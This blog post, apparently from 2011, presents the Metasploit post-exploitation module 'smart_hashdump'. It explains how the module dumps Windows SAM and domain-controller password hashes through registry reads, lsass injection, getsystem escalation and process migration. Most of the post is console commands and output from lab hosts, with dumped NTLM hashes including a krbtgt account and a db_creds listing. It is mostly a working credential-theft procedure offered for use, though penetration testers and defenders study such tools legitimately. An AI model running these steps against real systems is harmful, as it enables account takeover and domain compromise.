Smart_hashdump module by Carlos Perez
Download:
Features:
It first checks the Privilege Level and OS.
It will check if the target is a Domain Controller.
Based on this information it will prefer the reading of the registry to get the hashes if possible, if not possible it will inject in to the lsass process if possible. For Domain Controllers it will use the injection to lsass.
If the target is a Windows 2008 server and the process is running with admin privileges it will attempt to get system privilege using getsystem, if it gets SYSTEM privilege do to the way the token privileges are set it can still not inject in to the lsass process so the code will migrate to a process already running as SYSTEM and then inject in to the lsass process.
If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
On Windows 2003/2000/XP it will use getsystem and if successful it will use the read registry method
Script:
Code:
meterpreter > run smart_hasdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on
privilage level, OS and Role of host.
OPTIONS:
-h Help menu.
-l Log folder to save results, if none provided default log path will be used.
-s Try to get SYSTEM Privilege
Module:
Code:
msf exploit(handler) > use post/windows/gather/smart_hashdump
msf post(smart_hashdump) > info
Name: Windows Gather Local and Domain Controler Account Password Hashes
Module: post/windows/gather/smart_hashdump
Version: $Revision$
Platform: Windows
Arch:
Rank: Normal
Provided by:
Carlos Perez
Description:
This will dump local accounts from the SAM Database and if the
targets host is a Domain Controller the Domain Account Database
using the proper technique depending on privilage level, OS and Role
of host.
msf post(smart_hashdump) > show options
Module options (post/windows/gather/smart_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
GETSYSTEM false no Attempt to get SYSTEM Privilege on the target host.
SESSION yes The session to run this module on.
Both use the same calls and print almost the same messages so lets use the post module since it is what most of the code is moving to, first lets run it on a Windows 2008 R2 DC:
Code:
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true [*] Running module against WIN2K8R2-01 [*] Hashes will be saved to the Database if one is connected. [*] Hashes will be saved in loot in John Password File format to: [*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt [+] This host is a Domain Controller! [*] Dumping password hashes... [*] Trying to get SYSTEM Privilege [+] Got SYSTEM Privilege [*] Migrating to process owned by SYSTEM [*] Migrating to wininit.exe [+] Successfully migrated to wininit.exe [+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552::: [+] krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2::: [+] testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203::: [+] WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::
On a Windows 7 System with UAC Disabled as Administrator:
Code:
meterpreter > run post/windows/gather/smart_hashdump [*] Running module against WIN701 [*] Hashes will be saved to the Database if one is connected. [*] Hashes will be saved in loot in John Password File format to: [*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt [*] Dumping password hashes... [-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes [-] Try setting GETSYSTEM to true. meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true [*] Running module against WIN701 [*] Hashes will be saved to the Database if one is connected. [*] Hashes will be saved in loot in John Password File format to: [*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt [*] Dumping password hashes... [*] Trying to get SYSTEM Privilege [+] Got SYSTEM Privilege [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... [+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [+] adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
on a Windows 7 System as Administrator with UAC:
Code:
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true [*] Running module against WIN-KVJG16GEMOJ [*] Hashes will be saved to the Database if one is connected. [*] Hashes will be saved in loot in John Password File format to: [*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt [-] Insufficient privileges to dump hashes!
Sadly UAC does a good job at blocking dumping the hashes even as Administrator, it will even block getsystem.
on a Windows XP System:
Code:
meterpreter > run post/windows/gather/smart_hashdump [*] Running module against TEST-01BCDAF47C [*] Hashes will be saved to the Database if one is connected. [*] Hashes will be saved in loot in John Password File format to: [*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt [*] Dumping password hashes... [+] Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: [+] HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2::: [+] SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63::: meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true [*] Running module against TEST-01BCDAF47C [*] Hashes will be saved to the Database if one is connected. [*] Hashes will be saved in loot in John Password File format to: [*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt [*] Dumping password hashes... [*] Trying to get SYSTEM Privilege [+] Got SYSTEM Privilege [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... [+] Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: [+] HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2::: [+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
On XP and Windows 2003 if you are an administrator you can dump hashes with no problem and getsystem will yield success.
To get a list of all the accounts and hashes from the main console:
Code:
msf exploit(handler) > db_creds [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true [*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true [*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true [*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true [*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true [*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true [*] Found 9 credentials
No comments:
Post a Comment